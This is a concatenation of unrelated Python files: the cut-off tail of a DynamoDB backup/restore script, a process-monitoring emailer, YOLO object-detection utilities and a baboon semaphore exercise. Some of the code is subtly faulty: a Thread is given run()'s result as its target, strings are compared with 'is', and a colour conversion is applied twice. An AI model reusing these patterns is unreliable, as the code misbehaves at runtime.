action="store_true",
default=False,
help="Skip updating throughput values across tables [optional]",
)
parser.add_argument(
"--dumpPath",
help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP),
)
parser.add_argument(
"--billingMode",
help="Set billing mode between PROVISIONNED|PAY_PER_REQUEST "
" (defaults to use '" + str(BILLING_MODE) + "') [optional]",
choices=["PROVISIONNED", "PAY_PER_REQUEST"],
default=str(BILLING_MODE),
)
parser.add_argument(
"--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL " "[optional]"
)
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = _get_aws_client(
service="dynamodb",
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(
args.profile, args.region, args.tag
)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to backup: "
+ ", ".join(matching_backup_tables)
)
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(
target=do_backup,
args=(conn, args.readCapacity),
kwargs={"tableQueue": q},
)
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info(
"Backup of table(s) "
+ ", ".join(matching_backup_tables)
+ " completed!"
)
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(
args.profile, args.region, args.bucket, args.srcTable, args.archive
)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(
conn, dest_table, prefix_separator
)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found "
+ str(len(matching_destination_tables))
+ " table(s) in DynamoDB host"
+ delete_str
+ ", ".join(matching_destination_tables)
)
threads = []
for table in matching_destination_tables:
t = threading.Thread(
target=delete_table, args=(conn, sleep_interval, table)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(
args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_restore_tables))
+ " table(s) in "
+ args.dumpPath
+ " to restore: "
+ ", ".join(matching_restore_tables)
)
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity,
args.billingMode,
),
)
else:
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
change_prefix(
source_table,
args.srcTable,
dest_table,
prefix_separator,
),
args.writeCapacity,
args.billingMode,
),
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info(
"Restore of table(s) "
+ args.srcTable
+ " to "
+ dest_table
+ " completed!"
)
else:
delete_table(
conn=conn, sleep_interval=sleep_interval, table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity,
billing_mode=args.billingMode,
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to empty: "
+ ", ".join(matching_backup_tables)
)
threads = []
for table in matching_backup_tables:
t = threading.Thread(
target=do_empty, args=(conn, table, args.billingMode)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable, args.billingMode)
if __name__ == "__main__":
main()
|
main.py
|
"""
.. createdby: Darren Zhao Xie on 3/19/2019
.. currentmodule:: process_checker.main
Check if the process is running at certain time.
"""
import os
from threading import Thread
from time import sleep
from datetime import datetime
from process_checker.notifiers import Email
CHECK_ITI_FILE_PATH = '/path/to/file1'
CHECK_IL_FILE_PATH = '/path/to/file2'
APP_PROCESS = 'process_name1'
PROCESS_TIME = 5
class ProcessChecker:
"""
Check if some process is running.
"""
def __init__(self, iti_last_modified=None, il_last_modified=None):
self.iti_modified_time = iti_last_modified
self.il_modified_time = il_last_modified
def run(self, process_name, process_time):
"""
if it's the process time and files changed and the process is not running, send out notification email
:param process_name: the name of the application process
:param process_time: the time of the process expected to be running
:return:
"""
while True:
if not self.time_check(process_time):
# if distance >= 2, sleep 1 hour
if self.distance_hours(process_time) >= 2:
sleep(3600)
# if 2 > distance > 1, sleep 2 minutes
else:
sleep(120)
continue
elif not self.file_changed() or self.is_process_running(process_name):
continue
else:
Email().send(subject='ALERT: PROCESS NOT RUNNING ALERT',
body=f'{process_name} is not running by {process_time}')
# sleep 1 hour to avoid infinite email sending
sleep(3600)
@staticmethod
def time_check(process_time):
"""
Check if the current time is the process time, if so return true, else false.
:param process_time:
:return:
"""
now_hour = datetime.now().hour
if now_hour == process_time:
return True
return False
@staticmethod
def is_process_running(process_name):
"""
Check if process is running, if so return true, else false.
:param process_name:
:return:
"""
current_processes = os.popen("ps -Af").read()
if process_name in current_processes[:]:
return True
return False
def file_changed(self):
"""
Check file modified time, if changed, update property value and return true, else return false
:return:
"""
changed = False
if os.path.exists(CHECK_ITI_FILE_PATH):
iti_last_modified = os.path.getmtime(CHECK_ITI_FILE_PATH)
if iti_last_modified != self.iti_modified_time:
self.iti_modified_time = iti_last_modified
changed = True
if os.path.exists(CHECK_IL_FILE_PATH):
il_last_modified = os.path.getmtime(CHECK_IL_FILE_PATH)
if il_last_modified != self.il_modified_time:
self.il_modified_time = il_last_modified
changed = True
return changed
@staticmethod
def distance_hours(process_time):
"""
Check if the distance between process time and current time is bigger than / equal to 2 hours
:return:
"""
now_hour = datetime.now().hour
distance = process_time - now_hour
return distance if distance > 0 else distance + 24
if __name__ == '__main__':
thread = Thread(target=ProcessChecker().run(process_name=APP_PROCESS, process_time=PROCESS_TIME))
thread.start()
|
utils.py
|
#================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if YOLO_CUSTOM_WEIGHTS == False:
print("Loading Darknet_weights from:", Darknet_weights)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
checkpoint = f"./checkpoints/{TRAIN_MODEL_NAME}"
if TRAIN_YOLO_TINY:
checkpoint += "_Tiny"
print("Loading custom weights from:", checkpoint)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights(checkpoint) # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
try:
label = "{}".format(NUM_CLASS[class_ind]) + score_str
except KeyError:
print("You received KeyError, this might be that you are trying to use yolo original weights")
print("while using custom classes, if using custom model in configs.py set YOLO_CUSTOM_WEIGHTS = True")
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
ts = 0.9
cv2.putText(image, label, (10, 20 + int(ts*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL,
ts, (0, 0, 0), bbox_thick, lineType=cv2.LINE_AA)
cv2.putText(image, label, (11, 21 + int(ts*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL,
ts, (255, 255, 255), bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
# Process 2: Select the bounding box with the highest score according to socre order A
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: Calculate this bounding box A and
# Remain all iou of the bounding box and remove those bounding boxes whose iou value is higher than the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# To close the window after the required kill value was provided
cv2.destroyAllWindows()
return image
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
baboon_problem.py
|
#!/usr/bin/env python
"""baboon_problem.py: Solve the baboon semaphore problem.
1. Once a baboon has begun to cross the canyon it is guaranteed to get across.
2. There are never more than 5 baboons on the rope
3. A continuing stream of baboons in one direction should not lock out the other
direction from crossing eventually."""
__author__ = "Justin Overstreet"
__copyright__ = "oversj96.github.io"
import threading
from random import *
import time
directions = ['left', 'right']
# baboons is a Semaphore object with acquire and release as built-in
# functions. These functions act as wait and signal respectively.
baboons = threading.Semaphore(0)
left_count = 0
right_count = 0
rope = threading.Semaphore(1)
direction = 'left'
def crossing():
global right_count
global left_count
global direction
while True:
baboons.acquire()
print("A baboon is attempting to cross")
rope.acquire()
print(f"A baboon has the rope and is going {direction}.")
if direction is 'left' and left_count > 0:
left_count -= 1
direction = 'right'
elif direction is 'right' and right_count > 0:
right_count -= 1
direction = 'left'
print(f"A baboon has crossed from the {direction}")
rope.release() # release acts like signal
print("A baboon has released the rope.")
def baboon(travel_direction):
global left_count
global right_count
baboons.release()
print(f"A baboon has arrived wanting to go {travel_direction}.")
if travel_direction is "left":
left_count += 1
else:
right_count += 1
def generate_baboons():
global directions
while True:
if (right_count + left_count) > 100:
print("The baboon line is full!")
print(f"The right side has {right_count} ape(s).")
print(f"The left side has {left_count} ape(s).")
time.sleep(1)
else:
baboon(sample(directions, 1)[0])
if __name__ == "__main__":
t = threading.Thread(target = crossing)
t.start()
